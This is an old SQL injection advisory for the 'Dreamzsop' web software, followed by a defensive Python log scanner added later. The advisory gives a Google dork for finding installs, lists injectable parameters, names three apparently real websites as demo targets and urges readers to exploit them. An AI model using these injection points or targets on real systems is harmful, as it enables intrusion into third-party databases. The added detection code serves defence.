SQL Injection Vulnerability in Dreamzsop



EKU-ID: 367 CVE: OSVDB-ID:
Author: lionaneesh Published: 2011-05-31 Verified: Not Verified


# Exploit Title: SQL Injection Vulnerability in Dreamzsop
# Google Dork: intext:"By: Dreamzsop"
# Date: 30/5/2011
# Author: lionaneesh
# Software Link: http://dreamzsop.co.in/
# Risk Level : High
# A hacker can get admin access to the web database, leading to further
# attacks, shelling and rooting of the server

POC :-

http://[sitename]/[path]/index.php?id=%inject_here%

http://[sitename]/[path]/?members_id=%inject_here%

http://[sitename]/[path]/view_list.php?id=%Inject_Here%

http://[sitename]/[path]/articles.php?art_catid=%Inject_Here%


Just play with your imagination, search for more data inputs and
exploit! :D ;D :))


Demo :-

http://www.findfriendz.com/videos/online/index.php?id=%Inject_HERE%790
http://www.cbseguess.com/profiles/?members_id=%Inject_here%17967
http://www.smehelpline.com/listings/view_list.php?id=%Inject_here%3446
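
Added example, not part of the original advisory: every parameter listed in the POC (id, members_id, art_catid) carries a numeric record id, so a defender can flag access-log requests in which those parameters are not plain integers. The log lines are constructed; the Common Log Format layout and the 10-digit cap are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory's POC lists; its demo URLs show each holding a numeric id.
NUMERIC_PARAMS = {"id", "members_id", "art_catid"}
# Assumption: ids are 1-10 decimal digits (fits a 32-bit INT column).
INTEGER_RE = re.compile(r"[0-9]{1,10}")
# Request field of a Common Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

# Constructed sample lines (documentation IP ranges, made-up paths and ids).
SAMPLE_LOG = [
    '198.51.100.7 - - [31/May/2011:10:01:02 +0000] "GET /index.php?id=790 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [31/May/2011:10:01:09 +0000] "GET /index.php?id=790%27 HTTP/1.1" 500 312',
    '203.0.113.9 - - [31/May/2011:10:02:44 +0000] "GET /?members_id=17967 HTTP/1.1" 200 2048',
    '203.0.113.9 - - [31/May/2011:10:02:51 +0000] "GET /view_list.php?id=3446+x HTTP/1.1" 200 900',
    '192.0.2.4 - - [31/May/2011:10:03:00 +0000] "GET /articles.php?art_catid= HTTP/1.1" 200 100',
]

def non_integer_params(target):
    """Return (name, decoded value) for listed parameters that are not plain integers."""
    hits = []
    # parse_qs percent-decodes values, so encoded quotes or spaces cannot hide.
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name, values in query.items():
        if name.lower() in NUMERIC_PARAMS:
            hits += [(name, v) for v in values if not INTEGER_RE.fullmatch(v)]
    return hits

def scan(lines):
    """Return (line number, parameter, decoded value) for every flagged request."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            findings += [(number, n, v) for n, v in non_integer_params(match.group(1))]
    return findings

if __name__ == "__main__":
    for number, name, value in scan(SAMPLE_LOG):
        print(f"line {number}: {name}={value!r} is not a plain integer")
```

On the application side, the same integer check belongs in front of a parameterized query for each of these parameters.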


--------------------------------------------------------------------------------